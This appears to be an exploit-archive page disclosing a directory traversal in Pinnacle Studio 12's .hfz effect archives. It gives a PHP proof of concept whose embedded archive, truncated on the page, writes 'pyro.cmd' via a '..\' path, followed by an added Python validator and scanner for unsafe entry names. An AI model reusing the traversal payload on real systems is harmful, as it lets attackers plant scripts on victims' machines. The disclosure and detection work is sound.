
Pinnacle Studio 12 Directory Traversal

Posted May 13, 2009
Authored by Nine:Situations:Group | Site retrogod.altervista.org

Pinnacle Studio 12 "Hollywood FX Compressed Archive" (.hfz) directory traversal proof of concept exploit.

tags | exploit, proof of concept, file inclusion
SHA-256 | 140e18b7f263c208877fbd4b9e099be7be793ab75d118fc919ff39ed4291ab12

<?php
/*
Pinnacle Studio 12 "Hollywood FX Compressed Archive" (.hfz) directory
traversal vulnerability poc
by Nine:Situations:Group::pyrokinesis

Our site: http://retrogod.altervista.org/
Software site: http://www.pinnaclesys.com/

Some keys exported from the registry:

[HKEY_CLASSES_ROOT\.hfz]
@="hfzfile"

[HKEY_CLASSES_ROOT\.hfz\hfzfile]

[HKEY_CLASSES_ROOT\.hfz\hfzfile\ShellNew]

[HKEY_CLASSES_ROOT\hfzfile]
@="Hollywood FX Compressed Archive"

[HKEY_CLASSES_ROOT\hfzfile\DefaultIcon]
@="C:\\WINDOWS\\Installer\\{D041EB9E-890A-4098-8F94-51DA194AC72A}\\_A7BEE02B_CF3C_4710_85A0_92A3876E6F9C,0"

[HKEY_CLASSES_ROOT\hfzfile\shell]

[HKEY_CLASSES_ROOT\hfzfile\shell\Open]

[HKEY_CLASSES_ROOT\hfzfile\shell\Open\command]
@="\"C:\\Documents and Settings\\All Users.WINDOWS\\Documenti\\Pinnacle\\Content\\HollywoodFX\\InstallHFZ.exe\" \"%1\""
"command"=hex(7):70,00,7e,00,46,00,78,00,6b,00,3f,00,49,00,63,00,69,00,38,00,\
79,00,2b,00,37,00,32,00,6f,00,21,00,31,00,61,00,68,00,31,00,48,00,46,00,58,\
00,3e,00,49,00,4d,00,53,00,27,00,73,00,50,00,7a,00,2e,00,6a,00,3d,00,34,00,\
70,00,41,00,5b,00,4e,00,72,00,64,00,29,00,70,00,76,00,20,00,22,00,25,00,31,\
00,22,00,00,00,00,00

Usually files are decompressed in a Pinnacle effects folder...
The problem is ... that .hfz files can be used to overwrite files on the target system
or to place scripts in Startup folders by directory traversal attacks,
and InstallHFZ.exe decompresses them with no prompts!
Just modified an existing .hfz file and here is the dump ...
Also I experienced some crashes in doing this... investigating...

*/

$____path = "..\\..\\..\\..\\..\\..\\..\\..\\pyro.cmd";

$____payload = "\x48\x46\x58\x5a\x48\x46\x58\x5a\x9c\x07\x00\x00\x49\x00\x00\x00". "\x00\x21\x00\x00\x00\x7e". $____path. "\x65\x07\x00\x00\xa8\x1c\x00\x00\x8d\xc2\x71\x5a". "\x78\x9c\xbd\x59\x7b\x4c\x53\x57\x1c\xbe\x05\xf6\x10\x96\x6c\x0b". "\x33\xab\x2f\x5a\x2d\xe0\xe4\xdd\xd6\x84\xf2\x18\xbd\x2d\x6f\x04". "\x8a\xa5\x50\x44\x50\xcb\x1b\x05\x8a\x3c\xb4\x22\x8e\x25\x26\xcb". "\xd4\x64\xee\x8f\x2d\x9b\xcb\xe6\xd4\x2c\x21\xd3\x65\x6e\x59\xa2". "\x5b\x8c\x01\x97\xa8\x89\xc1\x05\xf7\xd7\xd8\x12\xcd\xc8\x12\x51". "\xf7\x62\xe0\x03\x5f\x77\xdf\xed\x69\x2f\xb7\xb7\xb7\xb7\xe5\xb2". "\xec\xe4\x77\x2e\xe7\x9e\x7b\xce\xef\x7c\xf7\xfb\x3d\xce\xb9\xa5". "\xa8\xa0\x26\xbf\x28\x3f\x4f\x97\x42\x51\x54\x24\xaa\xd9\x54\x99". "\x5c\xd1\xde\xad\x4e\xd3\xe3\x86\x3a\xd4\xd1\x9a\x13\x45\x7a\x93". "\x2a\x4a\x51\xad\x16\xb6\x5b\x41\x29\x5c\x54\x71\x59\xa1\x76\xf0". "\x15\x8a\x0a\x53\x84\x47\xa4\xa1\x33\x16\xd5\xfb\x37\x70\x79\xd3". "\xc8\xaf\x76\x3b\x13\x54\xaa\xab\x9f\x86\x32\xec\x3f\x97\x50\xd6". "\x4d\x4c\x1c\x0a\x2a\x09\x09\x6f\x48\x0f\x08\x65\xa1\xaa\xaa\x27". "\x16\xcb\x7d\xc8\x22\xf1\x00\x4c\x7a\xfa\x90\x46\xb3\x3b\x14\xe4". "\x44\x44\x17\x6a\x69\x61\x76\xee\x64\x6c\xb6\xc7\x10\x09\x3c\x4c". "\x5c\x9c\x3c\x79\x1a\x1b\xcb\xbf\x95\xc6\xd3\xdd\xcd\x6c\xde\xcc". "\x6c\xdc\x38\x07\x7e\x9c\x4e\xc6\x6a\x7d\x88\x76\x40\x3c\xa9\xa9". "\xf7\x56\xae\x0c\x02\x20\x21\xe1\xa1\x5a\x2d\x31\x60\xe2\xcc\x19". "\xbe\xf8\x2f\x04\x0c\xe0\x07\xd7\xca\xca\x47\x5b\xb7\x32\xa5\xa5". "\xb3\x25\x25\xff\x04\xe4\x67\xfd\xfa\x07\x31\x31\x8f\xd7\xac\x09". "\xb4\x1c\xc0\xb0\x78\xd2\xd3\xef\xaf\x5a\x25\x0f\x0f\x64\x60\x80". "\xb5\x17\x50\xa1\x8d\x6b\x4d\x0d\x53\x5b\x1b\x00\x0f\x4d\x33\x26". "\x93\xc0\x04\x44\xe6\x62\x63\x87\x95\x4a\xc8\x1d\x70\xa8\xd5\x4a". "\xf0\x33\x7b\xed\xda\x0f\xa7\x4e\x49\xe0\x81\xdb\x13\x4e\x60\x3e". "\xc2\x18\xb1\x1a\xdf\xc9\xe7\x75\xc6\xc7\xcf\xa9\x54\xb3\xcb\x97". "\x0b\x50\x4d\xb9\xcb\x65\x9b\x6b\x9a\xb0\x97\x98\xc8\xac\x5d\x8b". 
"\xc6\xa3\xd5\xab\xfd\xf9\xf9\xf1\xf4\x69\x09\x3c\x44\x0a\x0b\xff". "\x22\x60\x7a\x7a\x3c\x44\x01\xe7\x86\x0d\x33\xe4\x29\x56\xf7\x01". "\x60\x36\xb3\x0b\xe9\xf5\x5c\xe7\x6d\x77\x99\xd8\xba\x7f\x9a\xb3". "\xa6\xc1\xc0\x5e\x4d\x26\x51\x7b\x4d\x5d\xbc\x28\x8d\x07\x02\x4b". "\x11\x5a\x9a\x9b\x59\x3c\xad\xad\xec\x6d\x47\x87\x78\x7c\xb1\x48". "\x52\x53\xe1\xc0\x84\x01\x82\xe7\x6a\xcd\xc0\xb4\xc0\xbb\x32\x32". "\xf8\x2f\x12\x8a\xff\x08\xa4\xa8\xe8\x6f\xe0\x81\xc9\xca\xcb\xef". "\x21\x1b\x80\xb1\x80\xf1\x1e\x1f\xef\x01\x96\x99\x49\xf0\x7c\x91". "\xd7\x26\xc4\xc3\x49\x72\x32\xae\x93\x23\x23\x0b\xc5\x43\x04\x90". "\x20\x68\xec\xd8\xc1\x72\x25\x11\xc2\x0f\xd6\xac\x99\xd1\x68\x08". "\x9e\xc3\x7a\x3b\xf0\xf8\x3b\x3c\xd7\xf3\xf3\xd9\xb3\x80\x71\x65". "\x78\x78\xa1\x78\x88\xa5\x90\x04\x48\xdc\x91\xe0\x12\x8d\xe2\xdf". "\xba\x3e\x44\x58\x11\x3c\xfb\xd3\x6c\x1c\x3f\xa2\x61\x48\x60\x5c". "\x3f\x77\x4e\x06\x1e\x22\x34\x3d\x55\x5f\xcf\x20\xa0\xe0\xc3\xac". "\xce\xec\x6c\xc1\x8b\x03\x46\xd2\xd2\xd5\x04\xcf\x50\x8a\x15\x78". "\x66\x96\x2d\x93\x88\x77\x79\xf6\xe2\x0b\xd2\x91\x27\xc9\xa8\x54". "\x82\x64\x48\xf0\x70\x65\xdf\x6b\x65\x7f\xa8\x54\x4f\x34\x1a\x8c". "\x14\xc5\x83\x80\xad\xab\x63\x75\xba\x5c\x9e\xd4\x27\x0f\x12\x5f". "\xe7\xdd\x15\x2b\x18\xa3\x91\x6f\x3b\x0e\xcf\x50\x42\xb9\xc7\x5e". "\x08\xf3\x82\x02\x7f\x3c\x44\x1b\x49\x74\x48\xc2\xc8\x2d\xd8\xd0". "\x17\x89\x87\x64\x39\x6c\x1c\x10\x01\xa4\xb7\x12\xca\x89\xdb\x60". "\x00\x1a\xe4\xea\x8f\x67\xef\x5e\xa6\xa2\xe2\xc1\xf6\xed\x32\xc9". "\x09\x18\xef\x49\x49\xdc\xee\x79\x43\xad\xbe\x2c\xd8\x6d\xe3\xe3". "\x81\x07\xb6\xf3\xc7\x63\x77\x6f\x0a\x70\x4b\xd1\xb5\xf2\xf2\x7e". "\x97\x89\x87\x64\xe0\x94\x14\xa9\x7d\xdf\x68\x84\xcb\x71\xc0\x82". "\x2e\xb4\x6b\x17\x0b\x15\x3b\xbb\x1c\x3c\x71\x71\xac\x17\x91\xb8". "\x93\x90\xac\x2c\xce\xb2\xd2\xab\x20\xbd\x60\x77\x40\x86\x41\x1e". "\x16\x3d\xf9\x70\x27\xcc\x20\x2b\x86\x2c\x12\x60\xb0\x5b\xc1\xc3". "\xe1\xea\x84\x1c\x04\x20\x12\x20\x4e\x65\x12\x53\x2c\x96\x5b\x34". 
"\x7d\x2e\x3b\xfb\xeb\xf0\xf0\xe7\x15\x0a\xc5\xf8\xf8\x38\x17\x59". "\x4a\xa5\xb2\x25\xc1\x66\x30\x0c\xe7\xe5\x9d\xed\xef\x9f\x95\xed". "\xa8\x90\xe2\xe2\x69\x72\x50\x04\x1b\x88"; // the dump breaks off here; the rest of the archive is not on the page

$_f = fopen("puf.hfz", "w+");

fputs($_f, $____payload);

fclose($_f);

?>
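
The check the installer is missing, and a triage scan for .hfz files, as an added example (not part of the original advisory and not vendor code). Assumptions: the extraction root C:\Effects is hypothetical, and the header layout (a 4-byte little-endian length followed by '~' and the entry name, ahead of the zlib stream) is inferred only from the single dump above.

```python
import ntpath
import struct

HFZ_MAGIC = b"HFXZHFXZ"  # first eight bytes of the dump on this page
ZLIB_HDR = b"\x78\x9c"   # start of the compressed stream in the dump

def is_safe_entry(name, root=r"C:\Effects"):
    """True only if name stays under root after Windows path resolution."""
    if not name or "\x00" in name:
        return False
    name = name.replace("/", "\\")
    drive, _ = ntpath.splitdrive(name)
    if drive or name.startswith("\\"):
        return False  # absolute, drive-relative or UNC path
    base = ntpath.normpath(root)
    target = ntpath.normpath(ntpath.join(base, name))
    return target.lower().startswith(base.lower() + "\\")

def header_names(data):
    """Length-prefixed printable strings found before the zlib stream.
    Assumption: a name is a 4-byte little-endian length followed by that many
    bytes, the first being '~', as the single dump on this page suggests.
    """
    if not data.startswith(HFZ_MAGIC):
        raise ValueError("missing HFXZHFXZ magic")
    end = data.find(ZLIB_HDR, len(HFZ_MAGIC))
    header = data[:end] if end != -1 else data[:4096]
    names, pos = [], len(HFZ_MAGIC)
    while pos + 4 <= len(header):
        (n,) = struct.unpack_from("<I", header, pos)
        raw = header[pos + 4:pos + 4 + n]
        if 0 < n <= 260 and len(raw) == n and all(0x20 <= b < 0x7F for b in raw):
            names.append(raw.decode("ascii").lstrip("~"))
            pos += 4 + n
        else:
            pos += 1
    return names

def unsafe_names(data, root=r"C:\Effects"):
    return [n for n in header_names(data) if not is_safe_entry(n, root)]

def sample_header(name):
    """Constructed test input (header only, no archive body)."""
    body = b"~" + name.encode("ascii")
    return HFZ_MAGIC + bytes(9) + struct.pack("<I", len(body)) + body + bytes(12) + ZLIB_HDR

if __name__ == "__main__":
    for entry in ("fx\\wipe.hfx", "..\\..\\x.cmd"):
        print(entry, "->", unsafe_names(sample_header(entry)) or "ok")
```

Stripping the leading '~' before the check matters: left in place, "~.." would be resolved as an ordinary directory name and the traversal would pass as safe.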

